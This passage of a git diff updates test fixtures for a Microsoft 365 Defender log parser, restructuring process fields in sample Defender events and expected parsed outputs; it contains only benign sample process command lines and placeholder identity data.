-        "pid": 0
+        "args": [
+          "-Embedding",
+          "ABCDEF0123456789",
+          "E",
+          "Global\\HOST0000"
+        ],
+        "code_signature": {
+          "status": "Valid",
+          "subject_name": "OsVendor"
+        },
+        "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
+        "executable": "c:\\windows\\file.exe",
+        "hash": {
+          "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+          "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+          "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+        },
+        "name": "file.exe",
+        "pid": 10868,
+        "start": "2024-11-08T14:38:00.674494Z",
+        "user": {
+          "domain": "account domain",
+          "id": "S-1-2-3",
+          "name": "syst\u00e8me"
+        },
+        "working_directory": "c:\\windows"
       },
-      "pid": 423627,
-      "start": "2024-10-22T15:09:44.594155Z",
-      "user": {
-        "domain": "computer",
-        "name": "root"
-      }
+      "pid": 4520,
+      "start": "2024-11-08T14:38:51.903048Z",
+      "working_directory": "C:\\Windows"
     },
     "related": {
       "hash": [
-        "098f6bcd4621d373cade4e832627b4f6",
-        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
-        "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3"
+        "44543e0c6f30415c670c1322e61ca68602d58708",
+        "51a9cac9c4e8da44ffd7502be17604ee",
+        "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323",
+        "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
       ],
       "user": [
-        "root"
+        "syst\u00e8me"
       ]
     },
     "user": {
-      "domain": "computer",
-      "name": "root"
+      "domain": "account domain",
+      "name": "syst\u00e8me"
     }
   }
 }
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
index 3fe0d2cf8..212f23549 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
@@ -16,17 +16,19 @@
     "@timestamp": "2023-01-04T14:35:20.616193Z",
     "action": {
       "properties": {
-        "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
-        "InitiatingProcessFileSize": 445440,
-        "InitiatingProcessIntegrityLevel": "System",
-        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
-        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
-        "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client",
-        "InitiatingProcessVersionInfoInternalFileName": "omadmclient",
-        "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe",
-        "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
-        "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193",
-        "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements"
+        "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements",
+        "process": {
+          "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
+          "FileSize": 445440,
+          "IntegrityLevel": "System",
+          "TokenElevation": "TokenElevationTypeDefault",
+          "VersionInfoCompanyName": "Microsoft Corporation",
+          "VersionInfoFileDescription": "Host Process for OMA-DM Client",
+          "VersionInfoInternalFileName": "omadmclient",
+          "VersionInfoOriginalFileName": "omadmclient.exe",
+          "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+          "VersionInfoProductVersion": "10.0.19041.2193"
+        }
       },
       "type": "RegistryKeyDeleted"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
index a04e0e8be..72f93da4e 100644
--- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
+++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
@@ -16,7 +16,11 @@
     "@timestamp": "2024-10-22T15:09:47.246794Z",
     "action": {
       "properties": {
-        "InitiatingProcessLogonId": "0"
+        "process": {
+          "parent": {
+            "LogonId": "0"
+          }
+        }
       },
       "type": "ScriptContent"
     },
@@ -38,10 +42,9 @@
     },
     "process": {
       "parent": {
-        "pid": 0
-      },
-      "pid": 423638,
-      "start": "2024-10-22T15:09:47.165481Z"
+        "pid": 423638,
+        "start": "2024-10-22T15:09:47.165481Z"
+      }
     },
     "related": {
       "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json
index 294c92d60..5f3e9f9b1 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json
@@ -17,16 +17,18 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-        "InitiatingProcessFileSize": 14687048,
-        "InitiatingProcessLogonId": "121834210",
-        "InitiatingProcessVersionInfoCompanyName": "Google",
-        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
-        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
-        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+        "process": {
+          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+          "FileSize": 14687048,
+          "LogonId": "121834210",
+          "VersionInfoCompanyName": "Google",
+          "VersionInfoFileDescription": "Software Reporter Tool",
+          "VersionInfoInternalFileName": "software_reporter_tool_exe",
+          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+          "VersionInfoProductName": "Software Reporter Tool",
+          "VersionInfoProductVersion": "102.286.200"
+        }
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
index f2ac938fb..122a2bc61 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
@@ -3,7 +3,7 @@
     "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}"
   },
   "expected": {
-    "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}",
+    "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}",
     "event": {
       "action": "Moved to quarantine",
       "category": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
index 031a0b50a..57b4e7abc 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
@@ -16,16 +16,18 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-        "InitiatingProcessFileSize": 14687048,
-        "InitiatingProcessLogonId": "121834210",
-        "InitiatingProcessVersionInfoCompanyName": "Google",
-        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
-        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
-        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+        "process": {
+          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+          "FileSize": 14687048,
+          "LogonId": "121834210",
+          "VersionInfoCompanyName": "Google",
+          "VersionInfoFileDescription": "Software Reporter Tool",
+          "VersionInfoInternalFileName": "software_reporter_tool_exe",
+          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+          "VersionInfoProductName": "Software Reporter Tool",
+          "VersionInfoProductVersion": "102.286.200"
+        }
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
index 7d110bb54..e45140956 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
@@ -16,16 +16,18 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-        "InitiatingProcessFileSize": 14687048,
-        "InitiatingProcessLogonId": "121834210",
-        "InitiatingProcessVersionInfoCompanyName": "Google",
-        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
-        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
-        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+        "process": {
+          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+          "FileSize": 14687048,
+          "LogonId": "121834210",
+          "VersionInfoCompanyName": "Google",
+          "VersionInfoFileDescription": "Software Reporter Tool",
+          "VersionInfoInternalFileName": "software_reporter_tool_exe",
+          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+          "VersionInfoProductName": "Software Reporter Tool",
+          "VersionInfoProductVersion": "102.286.200"
+        }
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
index 0a0174b85..f1753e2d7 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
@@ -16,16 +16,18 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-        "InitiatingProcessFileSize": 14687048,
-        "InitiatingProcessLogonId": "121834210",
-        "InitiatingProcessVersionInfoCompanyName": "Google",
-        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
-        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
-        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+        "process": {
+          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+          "FileSize": 14687048,
+          "LogonId": "121834210",
+          "VersionInfoCompanyName": "Google",
+          "VersionInfoFileDescription": "Software Reporter Tool",
+          "VersionInfoInternalFileName": "software_reporter_tool_exe",
+          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+          "VersionInfoProductName": "Software Reporter Tool",
+          "VersionInfoProductVersion": "102.286.200"
+        }
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
index de75ec66d..0948ffe48 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
@@ -3,7 +3,7 @@
     "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}"
   },
   "expected": {
-    "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}",
+    "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}",
     "event": {
       "category": [
         "iam"
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
index 6077ecfdc..3e55ad2b0 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
@@ -16,16 +16,18 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-        "InitiatingProcessFileSize": 14687048,
-        "InitiatingProcessLogonId": "121834210",
-        "InitiatingProcessVersionInfoCompanyName": "Google",
-        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
-        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
-        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+        "process": {
+          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+          "FileSize": 14687048,
+          "LogonId": "121834210",
+          "VersionInfoCompanyName": "Google",
+          "VersionInfoFileDescription": "Software Reporter Tool",
+          "VersionInfoInternalFileName": "software_reporter_tool_exe",
+          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+          "VersionInfoProductName": "Software Reporter Tool",
+          "VersionInfoProductVersion": "102.286.200"
+        }
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json
index f33a1eb87..55684497d 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json
@@ -16,16 +16,18 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-        "InitiatingProcessFileSize": 14687048,
-        "InitiatingProcessLogonId": "121834210",
-        "InitiatingProcessVersionInfoCompanyName": "Google",
-        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
-        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
-        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+        "process": {
+          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+          "FileSize": 14687048,
+          "LogonId": "121834210",
+          "VersionInfoCompanyName": "Google",
+          "VersionInfoFileDescription": "Software Reporter Tool",
+          "VersionInfoInternalFileName": "software_reporter_tool_exe",
+          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+          "VersionInfoProductName": "Software Reporter Tool",
+          "VersionInfoProductVersion": "102.286.200"
+        }
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
index 3cedbfdb3..5a6e54961 100644
--- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json
+++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
@@ -16,16 +16,18 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-        "InitiatingProcessFileSize": 14687048,
-        "InitiatingProcessLogonId": "121834210",
-        "InitiatingProcessVersionInfoCompanyName": "Google",
-        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
-        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
-        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+        "process": {
+          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+          "FileSize": 14687048,
+          "LogonId": "121834210",
+          "VersionInfoCompanyName": "Google",
+          "VersionInfoFileDescription": "Software Reporter Tool",
+          "VersionInfoInternalFileName": "software_reporter_tool_exe",
+          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+          "VersionInfoProductName": "Software Reporter Tool",
+          "VersionInfoProductVersion": "102.286.200"
+        }
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json
index 3a5d48cd4..9304ca1cb 100644
--- a/Microsoft/microsoft-365-defender/tests/test_process_error.json
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json
@@ -22,10 +22,14 @@
     "@timestamp": "2024-09-24T14:18:11.864114Z",
     "action": {
       "properties": {
-        "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
-        "InitiatingProcessFileSize": 11864,
-        "InitiatingProcessLogonId": "0",
-        "LogonId": "0"
+        "LogonId": "0",
+        "process": {
+          "parent": {
+            "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+            "FileSize": 11864,
+            "LogonId": "0"
+          }
+        }
       },
       "type": "ProcessCreated"
     },
@@ -55,30 +59,36 @@
         "-F",
         "smtpd_tls_protocols\\commandtest"
       ],
-      "code_signature": {
-        "status": "Unknown",
-        "subject_name": "Unknown"
-      },
       "command_line": "grep -F smtpd_tls_protocols\\commandtest",
-      "executable": "/usr/test/platform-python3.6",
-      "hash": {
-        "md5": "eeeee2999444ddaaaaa08598b06eafe7",
